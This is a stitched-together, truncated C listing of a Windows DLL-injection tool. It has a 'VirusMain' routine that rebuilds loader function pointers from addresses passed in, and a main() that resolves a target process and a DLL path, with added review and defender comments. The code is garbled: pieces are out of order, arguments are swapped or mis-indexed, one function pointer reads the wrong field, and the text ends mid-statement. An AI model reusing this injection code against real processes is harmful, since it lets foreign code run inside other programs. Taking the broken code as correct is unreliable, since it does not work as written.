if(hProcessSnap !=INVALID_HANDLE_value)CloseHandle(hProcessSnap);
return dwRet;
}
// VirusMain: routine with the thread-start shape (DWORD __stdcall, one pointer
// argument) that reads API addresses out of the RemotePara block it is given
// and casts them to typed function pointers.
// Para: parameter block; only its dwLoadLibrary and dwGetProcAddress fields are
//       read in the visible lines. The RemotePara definition is not in this listing.
// NOTE(review): presumably meant to execute inside another process, which would
// explain why the loader addresses are handed in rather than called directly.
// Confirm against the caller.
// Defender note: a parameter block carrying LoadLibrary/GetProcAddress addresses
// is a common trait of code intended to run in a foreign process; remote thread
// creation telemetry (e.g. Sysmon Event ID 8, CreateRemoteThread) is the usual
// place to look for it.
// NOTE(review): declared to return DWORD, but no return statement is visible;
// the body appears to be truncated in this listing.
DWORD __stdcall VirusMain(RemotePara *Para){
// Local function-pointer types for the three loader routines.
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
// NOTE(review): Win32 FreeLibrary returns BOOL, so this typedef's HINSTANCE
// return type does not match the API it is named after.
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
// Values stored in Para are cast to callable pointers.
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;
// NOTE(review): read from dwLoadLibrary, the same field as LoadLibraryFunc above,
// so as written this pointer does not refer to a separate routine.
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwLoadLibrary;
// (nothing further of the body is present in this listing)
}
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include<psapi.h>
// Prototypes for the helpers that main calls.
DWORD ProcessToPID( char *); // converts a process name to its PID
void CheckError ( int, int, char *); // error-handling routine
void usage ( char *); // prints usage instructions
// File-scope state shared across the program. In the visible lines only
// dwRemoteProcessId is assigned (in main, from the command line).
// NOTE(review): the names suggest a handle to a target process, a thread created
// in it, and a library path placed in that process. The code that uses them is
// outside this excerpt, so confirm there.
PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
//处理命令行参数
if (argc!=3) usage("Parametes number incorrect!");
else{
//如果输入的是进程名,则转化为PID
if(isdigit(*argv)) dwRemoteProcessId = atoi(argv);
else dwRemoteProcessId = ProcessToPID(argv);
//判断输入的DLL文件名是否是绝对路径
if(strstr(argv,":\\")!=NULL)
strncpy(argv, lpDllFullPathName, MAX_PATH);
else
{ //取得当前目录,将相对路径转换成绝对路径
iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);
CheckError(iReturnCode, 0, "GetCurrentDirectory");
strcat(lpDllFullPathName, "\\");
strcat(lpDllFullPathName, argv);
printf("Convert DLL filename to FullPathName:\n\t%s\n\n",
lpDllFull